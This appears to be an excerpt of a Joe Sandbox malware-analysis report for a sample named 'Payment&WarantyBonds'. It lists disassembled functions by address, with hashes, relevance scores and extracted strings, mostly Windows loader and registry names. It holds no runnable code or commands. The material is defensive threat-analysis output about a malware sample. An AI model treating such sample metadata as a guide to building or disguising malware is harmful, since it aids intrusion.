                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                                                                                                                                • API String ID: 0-3870751728
                                                                                                                                                                                • Opcode ID: 64bcc42cb947f4e4f68778a1353e30578230ea80288157effd54b23b3af877d0
                                                                                                                                                                                • Instruction ID: c54280301d5d436e9ac36f3de7a6ec9ee8dfec7aa78501cb5eaf2c692fe94d85
                                                                                                                                                                                • Opcode Fuzzy Hash: 64bcc42cb947f4e4f68778a1353e30578230ea80288157effd54b23b3af877d0
                                                                                                                                                                                • Instruction Fuzzy Hash: 18914DB0E002059FEB24CF69C480BADBBF1BF68315F55C16AD905AB3A1E7759842CF54
                                                                                                                                                                                Function 0142B440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                                                                                • API String ID: 0-373624363
                                                                                                                                                                                • Opcode ID: 95975c23fead4dfe5a59e791a7d961ad1e9453bb59943f9f3a75d2510e222749
                                                                                                                                                                                • Instruction ID: 20711ec6bc79bc0177f14d292c436c6d7b3085e6da229add871aa339e79ce068
                                                                                                                                                                                • Opcode Fuzzy Hash: 95975c23fead4dfe5a59e791a7d961ad1e9453bb59943f9f3a75d2510e222749
                                                                                                                                                                                • Instruction Fuzzy Hash: F191BE71A04229CBEB21DF58C850BAE7BB0FF00714F54819BE915AB3A0D778D9C1CB91
                                                                                                                                                                                Function 0145909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: %$&$@
                                                                                                                                                                                • API String ID: 0-1537733988
                                                                                                                                                                                • Opcode ID: 0713ffebac69b0b7505815a22b11d2cb33d0584c166aa28707b38dfb5df0aa35
                                                                                                                                                                                • Instruction ID: a42e2bc9529fdf9e7ec25df991c6cf3057a9f8fda8e9533b11f115521afb19c0
                                                                                                                                                                                • Opcode Fuzzy Hash: 0713ffebac69b0b7505815a22b11d2cb33d0584c166aa28707b38dfb5df0aa35
                                                                                                                                                                                • Instruction Fuzzy Hash: DB71BF70508342DFDB55DF19C584A2BBBE5BF94658F108A1FF89A4B262C731D806CB92
                                                                                                                                                                                Function 0141758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                                                                • API String ID: 0-1151232445
                                                                                                                                                                                • Opcode ID: 1244e05ed4b7da31b882a3596127ef74bf0f934ed650ff877246c352735b038a
                                                                                                                                                                                • Instruction ID: 7f88386059c08681416d7fb1efedfb30b3ea837a792a9202a02fa519a3bcc766
                                                                                                                                                                                • Opcode Fuzzy Hash: 1244e05ed4b7da31b882a3596127ef74bf0f934ed650ff877246c352735b038a
                                                                                                                                                                                • Instruction Fuzzy Hash: 504105713002808FEF29CB1DC4A47BA7BA19F15355F2C486FD54A8B3BAD674D886CB52
                                                                                                                                                                                Function 014DC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • @, xrefs: 014DC1F1
                                                                                                                                                                                • PreferredUILanguages, xrefs: 014DC212
                                                                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 014DC1C5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                                • API String ID: 0-2968386058
                                                                                                                                                                                • Opcode ID: 37cf488b0386f693164da7cd486324d7504e6f310cc14a1a58fdf4da5fc52233
                                                                                                                                                                                • Instruction ID: 7bf4b64b17a4b38dfdd72259fb9dd25f4cfceb212da748b2ca446f55899dbf9e
                                                                                                                                                                                • Opcode Fuzzy Hash: 37cf488b0386f693164da7cd486324d7504e6f310cc14a1a58fdf4da5fc52233
                                                                                                                                                                                • Instruction Fuzzy Hash: 85418072E0020AEBDF11DBD9C891FEEBBB9AB24704F10416FE609A7260D7749A44CB50
                                                                                                                                                                                Function 014B4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                                • API String ID: 0-1373925480
                                                                                                                                                                                • Opcode ID: fa787307a947492878c4e297a7164d2bda4f9115b76d7ad90c063db851118342
                                                                                                                                                                                • Instruction ID: 7c05f3b7102692789d84a45464fe6fbbd8b5eeeb0796308b6a83eb927c38dee9
                                                                                                                                                                                • Opcode Fuzzy Hash: fa787307a947492878c4e297a7164d2bda4f9115b76d7ad90c063db851118342
                                                                                                                                                                                • Instruction Fuzzy Hash: 2541F931A006588BEB25DBD9D884BEDBBB4FF65340F18045BD902EB7B2D7349902CB61
                                                                                                                                                                                Function 014533A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • RtlCreateActivationContext, xrefs: 014929F9
                                                                                                                                                                                • SXS: %s() passed the empty activation context data, xrefs: 014929FE
                                                                                                                                                                                • Actx , xrefs: 014533AC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                                                                                                • API String ID: 0-859632880
                                                                                                                                                                                • Opcode ID: 711aca9b6c22c30257a9a97afb02a5ca29bcfc40ecc2fd636cc2a2f4fda64847
                                                                                                                                                                                • Instruction ID: 1d88dd18999d9498e315a215cf4e8beab89d7cb11249c563fc2216fe4af94a68
                                                                                                                                                                                • Opcode Fuzzy Hash: 711aca9b6c22c30257a9a97afb02a5ca29bcfc40ecc2fd636cc2a2f4fda64847
                                                                                                                                                                                • Instruction Fuzzy Hash: B3311233600205ABEF22DF59D880F977BA4BB55764F15846AEE049F3A2C774E842CB90
                                                                                                                                                                                Function 014AB594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • @, xrefs: 014AB670
                                                                                                                                                                                • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 014AB632
                                                                                                                                                                                • GlobalFlag, xrefs: 014AB68F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                                                                • API String ID: 0-4192008846
                                                                                                                                                                                • Opcode ID: 4323d8ce0659379007a6b4273275dd7742ffcfcf2b208bd9eef54ce74bc1ab36
                                                                                                                                                                                • Instruction ID: 5cd42e630c98fcd3d987028c8dd6d1c7489eec7ce60de0773a9a60666694c718
                                                                                                                                                                                • Opcode Fuzzy Hash: 4323d8ce0659379007a6b4273275dd7742ffcfcf2b208bd9eef54ce74bc1ab36
                                                                                                                                                                                • Instruction Fuzzy Hash: F3315CB1A00219AFDB10EF95CC80EEFBB7CEF64744F55046EE604A7260D7749A40CBA5
                                                                                                                                                                                Function 01461270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • @, xrefs: 014612A5
                                                                                                                                                                                • BuildLabEx, xrefs: 0146130F
                                                                                                                                                                                • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0146127B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                • API String ID: 0-3051831665
                                                                                                                                                                                • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                                                                                                • Instruction ID: 6b2df207560c15e2738bd35b754c31debdac9bb7107065039cc9e555f6504ae1
                                                                                                                                                                                • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                                                                                                • Instruction Fuzzy Hash: 66318172900619BBDB11DF96CC44EDEBFBDEBA4B58F00402BE915A7270D730DA458B61
                                                                                                                                                                                Function 014A20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • Process initialization failed with status 0x%08lx, xrefs: 014A20F3
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 014A2104
                                                                                                                                                                                • LdrpInitializationFailure, xrefs: 014A20FA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-2986994758
                                                                                                                                                                                • Opcode ID: 7b2171b51a1a2d030876a5e3cf1521eca9850acef6457e6186ec7363432471d5
                                                                                                                                                                                • Instruction ID: 05ca540ed4ca2e8adfc72378ada3f49d650b5900c1c3f64f03689c3b0f51f127
                                                                                                                                                                                • Opcode Fuzzy Hash: 7b2171b51a1a2d030876a5e3cf1521eca9850acef6457e6186ec7363432471d5
                                                                                                                                                                                • Instruction Fuzzy Hash: 32F02835640309ABE721E70EDC46F9A3768EB51B58F51002EF7007B2E1D2F0A600D641
                                                                                                                                                                                Function 014303E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: #%u
                                                                                                                                                                                • API String ID: 48624451-232158463
                                                                                                                                                                                • Opcode ID: 3fe2e305de9013dcc89e9ee1b2bd8bbec9cb9410153043054f3f8f5157f3513f
                                                                                                                                                                                • Instruction ID: 4b6c60fdb8e75e91e0c8458f42cc2290c93584073598ebd3cd7430b82eafccd6
                                                                                                                                                                                • Opcode Fuzzy Hash: 3fe2e305de9013dcc89e9ee1b2bd8bbec9cb9410153043054f3f8f5157f3513f
                                                                                                                                                                                • Instruction Fuzzy Hash: 3C715D71A0014A9FDB01DFA9D984FAEB7F8BF68304F15406AE905E7261E634EE01CB61
                                                                                                                                                                                Function 014352A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$@
                                                                                                                                                                                • API String ID: 0-149943524
                                                                                                                                                                                • Opcode ID: fc77d66dfbd4aa4cfcc2c5136454fa64dc7a0e9e0c98f7db8c88343f567336a0
                                                                                                                                                                                • Instruction ID: a0e208481a746a7b67fcc1cdd7e8ddcfcbe7dcbb869f31e2232f1ecb94ceb5fa
                                                                                                                                                                                • Opcode Fuzzy Hash: fc77d66dfbd4aa4cfcc2c5136454fa64dc7a0e9e0c98f7db8c88343f567336a0
                                                                                                                                                                                • Instruction Fuzzy Hash: D33279705083518BD7289F19C480B3FBBE1AFC8754F15492FEA898B3A0E734D985DB92
                                                                                                                                                                                Function 014EA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: `$`
                                                                                                                                                                                • API String ID: 0-197956300
                                                                                                                                                                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                                • Instruction ID: cb1a066bc26226a4c3ef6c74aa06d1d655beae4ca5449369c74f2d7ce116cabe
                                                                                                                                                                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                                • Instruction Fuzzy Hash: 56C1D4312043429BEB24CF29C849B6BBBE5BFD4319F284A2EF695C72A0D774D505CB41
                                                                                                                                                                                Function 0142A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 0142A2FB
                                                                                                                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 0142A309
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                • API String ID: 0-2876891731
                                                                                                                                                                                • Opcode ID: 1485ee92002bd4203a6bb7d313c12182f22d27e1415c05706da42885105d2854
                                                                                                                                                                                • Instruction ID: 677314143fa23870b3c0fc1da75bcd396afa4ed0e1286af682a3c70682b8184c
                                                                                                                                                                                • Opcode Fuzzy Hash: 1485ee92002bd4203a6bb7d313c12182f22d27e1415c05706da42885105d2854
                                                                                                                                                                                • Instruction Fuzzy Hash: DE419A30A01665DBEB22DF59C844B6E7BB4EF94700F2440AAED00DB7B2E2B5D981CB50
                                                                                                                                                                                Function 014B35BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                                                                • API String ID: 0-118005554
                                                                                                                                                                                • Opcode ID: 520e9161d7eea514a881cf9d3f8c78f7eeb444b9dd677ce71db068d4d508e78e
                                                                                                                                                                                • Instruction ID: e71b3042f2a936d141590dc62ed50c9711f827ebf4cddecce8807b22bc14850b
                                                                                                                                                                                • Opcode Fuzzy Hash: 520e9161d7eea514a881cf9d3f8c78f7eeb444b9dd677ce71db068d4d508e78e
                                                                                                                                                                                • Instruction Fuzzy Hash: AD31C5312087419BE321DF2AD494B5AB7E4FFA9714F05095EF958CB3A0E734D905CBA2
                                                                                                                                                                                Function 0145329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: .Local\$@
                                                                                                                                                                                • API String ID: 0-380025441
                                                                                                                                                                                • Opcode ID: a6fe986766aeb2b3d9ea7892299377ea3d0c83e0e64ba94fe227780f56832713
                                                                                                                                                                                • Instruction ID: 41e0b424395066d8f40c024259ea108f3813374bf42dc6fac277ab841c6ebe81
                                                                                                                                                                                • Opcode Fuzzy Hash: a6fe986766aeb2b3d9ea7892299377ea3d0c83e0e64ba94fe227780f56832713
                                                                                                                                                                                • Instruction Fuzzy Hash: 7931A472508305AFC351DF29C480A5BBBE8FB95794F44092FF99583322DA34DD05CB92
                                                                                                                                                                                Function 0145A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                • API String ID: 2994545307-4008356553
                                                                                                                                                                                • Opcode ID: 4e20f59309abb7a156f13051ff64c86d686eebe329960cb811de16ee4811f54c
                                                                                                                                                                                • Instruction ID: 9539bb24e1101e5f10b9ebccd43023d7568aa66650b4f004f1fa44d7c0b069e6
                                                                                                                                                                                • Opcode Fuzzy Hash: 4e20f59309abb7a156f13051ff64c86d686eebe329960cb811de16ee4811f54c
                                                                                                                                                                                • Instruction Fuzzy Hash: 3E01ADB2240700AFD351DF24CD45B2677E8E794719F058A3EAA9CCB1A1E374D804CB56
                                                                                                                                                                                Function 01427370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5e966675d1a74d15482fc8f1c415611424b3e3ae6f72d4aa2a1a89d58b4e2e3e
                                                                                                                                                                                • Instruction ID: 51b1f34ec345c876732b96d07df4e930645971462b5e46e25c2cd20f316764b2
                                                                                                                                                                                • Opcode Fuzzy Hash: 5e966675d1a74d15482fc8f1c415611424b3e3ae6f72d4aa2a1a89d58b4e2e3e
                                                                                                                                                                                • Instruction Fuzzy Hash: F7A18C71608342CFC321DF29C480A2BBBE5BFA8715F54492FE5858B361E770E985CB92
                                                                                                                                                                                Function 014DB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: PreferredUILanguages
                                                                                                                                                                                • API String ID: 0-1884656846
                                                                                                                                                                                • Opcode ID: 2ab725c76db7bebd00f090c090786f0a68cbe32cd9653cef63b81c6678dc0e3f
                                                                                                                                                                                • Instruction ID: b8631926af281946363c71f8f7fb05dffc23a81e6b34a2c0525968fc68320987
                                                                                                                                                                                • Opcode Fuzzy Hash: 2ab725c76db7bebd00f090c090786f0a68cbe32cd9653cef63b81c6678dc0e3f
                                                                                                                                                                                • Instruction Fuzzy Hash: CA41C472D00219ABDF11DA99C850BEFB7B9EF56750F06012BEE01AB360DA30DE40D7A0
                                                                                                                                                                                Function 014C705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: kLsE
                                                                                                                                                                                • API String ID: 0-3058123920
                                                                                                                                                                                • Opcode ID: 4b970fc20b42183110fd64255e2af8e22a5816df332bc2dcb2760b74decdd56a
                                                                                                                                                                                • Instruction ID: 816075794d9b1c76d830ce89e269e7a51f7e4eae58ef839e3d670b20f39544bc
                                                                                                                                                                                • Opcode Fuzzy Hash: 4b970fc20b42183110fd64255e2af8e22a5816df332bc2dcb2760b74decdd56a
                                                                                                                                                                                • Instruction Fuzzy Hash: 5241987510135247E732AB2AE884B663F91AB60B24F16052FED704F2E9CBF404CADB91
                                                                                                                                                                                Function 01457505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: #
                                                                                                                                                                                • API String ID: 0-1885708031
                                                                                                                                                                                • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                                                                                                                                • Instruction ID: c8324f7ae16474bf30576d76048deb1004b17113ae9d400ad73b09ce993c8f35
                                                                                                                                                                                • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                                                                                                                                • Instruction Fuzzy Hash: 0941CF7590025ADBCF618F48C490BBEBBB4EB54306F40406BE94697621D734DD42CBE1
                                                                                                                                                                                Function 01425096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Actx
                                                                                                                                                                                • API String ID: 0-89312691
                                                                                                                                                                                • Opcode ID: c6ba6410e1bb7d8415fb7f5b506673136201354b511ec4167cfb340482e8c497
                                                                                                                                                                                • Instruction ID: d11ee4baacafddba5f65928b1826bf4769b26fcc3a8731435d785e1fb08b9ec6
                                                                                                                                                                                • Opcode Fuzzy Hash: c6ba6410e1bb7d8415fb7f5b506673136201354b511ec4167cfb340482e8c497
                                                                                                                                                                                • Instruction Fuzzy Hash: BE1196707055329BE729491D8C506B7B695EB85214FB4812BE592CF3B1D675DCC2C380
                                                                                                                                                                                Function 014A106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LdrCreateEnclave
                                                                                                                                                                                • API String ID: 0-3262589265
                                                                                                                                                                                • Opcode ID: bad65a7bb86a2ed5a61c36f16f41a2476b45c1ebdfa4fc83ef20cc108396d8c9
                                                                                                                                                                                • Instruction ID: 8044a1fc112a833f0571c36ab38cf81a877b11faedcfb1b747fc2ceac0d9e69d
                                                                                                                                                                                • Opcode Fuzzy Hash: bad65a7bb86a2ed5a61c36f16f41a2476b45c1ebdfa4fc83ef20cc108396d8c9
                                                                                                                                                                                • Instruction Fuzzy Hash: DC21F3B15083449FD361DF1A8844A9BFBE8FBE5B50F414A1FB9A09A364D7B09404CB92
                                                                                                                                                                                Function 0147739A Relevance: .7, Instructions: 705COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
